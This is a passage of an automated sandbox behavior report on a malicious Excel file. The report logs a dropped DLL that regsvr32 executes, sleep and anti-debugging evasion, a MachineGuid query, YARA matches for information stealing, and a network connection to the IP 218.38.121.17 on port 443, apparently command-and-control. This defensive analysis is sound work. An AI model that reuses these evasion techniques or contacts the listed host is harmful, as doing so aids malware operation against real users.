Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2212 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 1648 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2956 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2548 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2548 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe API coverage: 2.8 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose, 9_2_00000001800132FC
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose, 10_2_00000001800132FC
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_100342D0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_100342D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress, 8_2_10014064
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId, 8_2_10031FC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_100342D0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_100342D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10034370 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_10034370
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10034490 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_10034490
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10040590 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_10040590
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10039C90 SetUnhandledExceptionFilter, 8_2_10039C90
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10039CC0 SetUnhandledExceptionFilter, 8_2_10039CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1002FF40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_1002FF40

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\regsvr32.exe Network Connect: 218.38.121.17 443 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA, 8_2_1004D2B0
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA, 8_2_10047310
Source: C:\Windows\System32\regsvr32.exe Code function: GetModuleHandleA,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetVersion,RegOpenKeyExA,RegQueryValueExA,ConvertDefaultLocale,ConvertDefaultLocale,RegCloseKey,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetLocaleInfoA,LoadLibraryA, 8_2_1001C3CC
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA, 8_2_10047440
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 8_2_10047560
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA, 8_2_100478B0
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 8_2_100499D0
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 8_2_10047A20
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA, 8_2_10047AF0
Source: C:\Windows\System32\regsvr32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 8_2_10053B44
Source: C:\Windows\System32\regsvr32.exe Code function: GetUserDefaultLCID,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoA,GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA, 8_2_10047B80
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte, 8_2_10049D10
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1003F040 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 8_2_1003F040
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId, 8_2_10031FC0

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1210571701.00000000002BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 8.2.regsvr32.exe.2010000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.939239138.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1210480334.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs